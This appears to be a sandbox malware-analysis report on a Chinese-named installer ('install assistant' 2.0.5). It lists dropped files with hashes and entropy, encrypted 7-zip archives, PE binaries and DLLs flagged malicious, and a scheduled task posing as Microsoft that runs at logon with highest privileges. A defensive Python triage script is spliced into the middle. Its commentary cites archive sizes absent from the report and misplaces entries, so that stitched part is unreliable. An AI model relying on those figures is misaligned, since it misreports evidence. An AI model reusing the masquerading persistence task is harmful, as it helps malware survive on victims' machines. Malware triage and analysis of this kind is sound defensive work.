                                                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):29730
                                                          Entropy (8bit):7.994290657653607
                                                          Encrypted:true
                                                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                                          Malicious:false
                                                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):29730
                                                          Entropy (8bit):7.994290657653608
                                                          Encrypted:true
                                                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                                                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                                          Malicious:false
                                                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:7-zip archive data, version 0.4
                                                          Category:dropped
                                                          Size (bytes):249984
                                                          Entropy (8bit):7.999231321310215
                                                          Encrypted:true
                                                          SSDEEP:3072:bq197wBcGJFKwAA/THosHch/5mC8rR2rUPXPMzBQZ3N0AVebaKsjBL2Itvz38sho:e2ckFr8h/5Ct2rUM1QVdw+KeySr3Fet
                                                          MD5:F81297786EB640B840BB7B630C00C588
                                                          SHA1:6B29628368E57D349B617755224ABB6A17FA61EF
                                                          SHA-256:ED33C18470A3C637FF0EA85152913C814CB959AC3F6C95AB505E7BD70C6D218F
                                                          SHA-512:45990D001BDB62654086B6D9D59B6D1545104DCC8C4D6D9D5F6B2A88F986C097A637F726DD56A23AA9538E9BC03ABE4AD9B159F61BF61D21B4CB21C4FDD7FB26
                                                          Malicious:false
                                                          Preview:7z..'...... .......@..........inxr.f\....../_...]...T...N@w[..1.A.f..e+.G.F...d]r.'sO:..B.....My.a.M.....gL.Q..}fI."H......cj........nu...4.y.J`....\,+sxS.e...o...o.n}..K|j},.Oh....l6[.-..a......C..f}.u....P..Q6]...XN..<2p....&r..qV..'...BV.t............l..1...../qq.v.V.^.6....a.)e.R..fr$.:G?.3....)..M..n.B.c..o.uC..y..........Z...u..9V.JE.>....x.f0@.E...>...r.r.W.............D..z.... ..D...*:.n.J.%..?.....E.a..j.............-...1....X..aRC>.2.,..0k...D.3+?..'.J.r...Q..#E.nH..;.>../JL.9&J<.$q......7.B.u...........yB......<....?...`._I.6.g.G.o.....H5.y.........w..qv..#(..v..?U..n..=..|...s..??\...F...Q.\k..v.m K....A..:....kY$......0g7#.5.|.W...M..b.d........j..........$..O....!.|N[=.P};.j..c....tJ&......p..cC.T...ai.....sJ...../..f .+.HD5.P(.nI..P[.T.*.....y..'../9..]_...`...SYc.IlK.7.f..j...J..pWF...z.<...w..!:.;f.U.~.3.J.@C.:.......ZB*.l.....%.....t"..4.".\.jA...sZ=.W.(<...aH.,E.k..:.......:.H.F4.?.E..O.oi..y...0.e.G.B....Ov.l...........
                                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):63640
                                                          Entropy (8bit):6.482810107683822
                                                          Encrypted:false
                                                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 9%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
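The rows above all carry the same per-file fields (File Type, Size, Entropy, Encrypted, hashes, Preview), and the two PE entries differ only in the subsystem word: "(native)" for the 63640-byte driver-style image here, "(console)" for the 5.6 MB binary earlier. The following is an added Python example, not Joe Sandbox code, that reproduces those fields for a blob read from disk: magic-byte sniffing for 7-zip and PE (including the subsystem and machine fields that yield "PE32+ executable (native) x86-64"), 8-bit Shannon entropy, hashes, the dotted Preview rendering, and a comparison of the file extension against the sniffed content. The 7.9 entropy cutoff for the Encrypted flag and the extension table are assumptions; the inputs at the bottom are constructed (a synthetic PE header and seeded random bytes behind a 7-zip magic), not files from this analysis.

```python
"""Reproduce the per-file triage fields of the dropped-file table above.

Added example, not Joe Sandbox code. Thresholds and the expected-extension
table are assumptions; the sample inputs at the bottom are constructed.
"""
import hashlib
import math
import os
import random
import struct
from collections import Counter

SEVEN_ZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"
PE_SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console"}
PE_MACHINES = {0x8664: "x86-64", 0x14C: "Intel 80386"}
ENCRYPTED_THRESHOLD = 7.9      # assumption: cutoff for the report's Encrypted:true flag
EXPECTED_PREFIX = {".exe": "PE32", ".dll": "PE32", ".sys": "PE32", ".7z": "7-zip"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def sniff_type(data: bytes) -> str:
    """Identify a blob by magic bytes, in the spirit of the 'File Type' field."""
    if data.startswith(SEVEN_ZIP_MAGIC):
        return "7-zip archive data"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        opt = e_lfanew + 24          # optional header follows 'PE\0\0' + 20-byte COFF header
        if opt + 70 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
            magic = struct.unpack_from("<H", data, opt)[0]
            subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32 and PE32+
            bits = "PE32+" if magic == 0x20B else "PE32"
            return (f"{bits} executable ({PE_SUBSYSTEMS.get(subsystem, subsystem)}) "
                    f"{PE_MACHINES.get(machine, hex(machine))}")
        return "MS-DOS executable"
    return "data"


def preview(data: bytes, length: int = 1024) -> str:
    """Printable ASCII kept, everything else shown as '.', like the report's Preview."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def extension_mismatch(name: str, sniffed: str) -> bool:
    """True when the extension promises one format and the bytes are another."""
    ext = os.path.splitext(name)[1].lower()
    if ext in EXPECTED_PREFIX:
        return not sniffed.startswith(EXPECTED_PREFIX[ext])
    return sniffed != "data"     # executable or archive behind an unrelated extension


def triage(name: str, data: bytes) -> dict:
    """One row of the dropped-file table for a blob read from disk."""
    kind = sniff_type(data)
    entropy = shannon_entropy(data)
    return {
        "name": name,
        "type": kind,
        "size": len(data),
        "entropy": round(entropy, 6),
        "encrypted": entropy >= ENCRYPTED_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
        "extension_mismatch": extension_mismatch(name, kind),
        "preview": preview(data, 64),
    }


def build_pe_header(machine: int = 0x8664, subsystem: int = 1) -> bytes:
    """Constructed minimal PE header (headers only, not a loadable image)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", machine, 0, 0, 0, 0, 0xF0, 0)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)                      # PE32+ magic
    struct.pack_into("<H", opt, 68, subsystem)                 # 1 = native, 3 = console
    return bytes(dos) + coff + bytes(opt)


# Constructed inputs: a native-subsystem PE header (driver-like) and seeded random
# bytes behind a 7-zip magic (version 0.4), standing in for an encrypted archive.
SAMPLE_DRIVER = build_pe_header(0x8664, 1)
SAMPLE_ARCHIVE = SEVEN_ZIP_MAGIC + b"\x00\x04" + random.Random(7).randbytes(56546 - 8)

if __name__ == "__main__":
    for name, blob in (("driver.dat", SAMPLE_DRIVER), ("payload.7z", SAMPLE_ARCHIVE)):
        for key, value in triage(name, blob).items():
            print(f"{key:>19}: {value}")
        print()
```

Run against the actual dropped files, the entropy of a ~56 KB archive of random-looking bytes lands near 7.997, which is what the table reports for the 56546-byte entries; a constant or text file sits far below the cutoff, so the Encrypted flag is really a "compressed or encrypted" flag and cannot distinguish the two on its own.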
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):3.3482223822620667
                                                          Encrypted:false
                                                          SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                                                          MD5:1E1D0466AB0FE8F2802587D337A10567
                                                          SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                                                          SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                                                          SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                                                          Malicious:false
                                                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):5649408
                                                          Entropy (8bit):6.392614480390128
                                                          Encrypted:false
                                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1628158735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nllluldhz/lL:NllU
                                                          MD5:03744CE5681CB7F5E53A02F19FA22067
                                                          SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                          SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                          SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                          Malicious:false
                                                          Preview:@...e.................................L..............@..........
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3598848
                                                          Entropy (8bit):7.004949099807939
                                                          Encrypted:false
                                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3366912
                                                          Entropy (8bit):6.530548291878271
                                                          Encrypted:false
                                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                          Malicious:true
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3366912
                                                          Entropy (8bit):6.530548291878271
                                                          Encrypted:false
                                                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                                          MD5:9902FA6D39184B87AED7D94A037912D8
                                                          SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                                          SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                                          SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                                          Malicious:true
                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3598848
                                                          Entropy (8bit):7.004949099807939
                                                          Encrypted:false
                                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
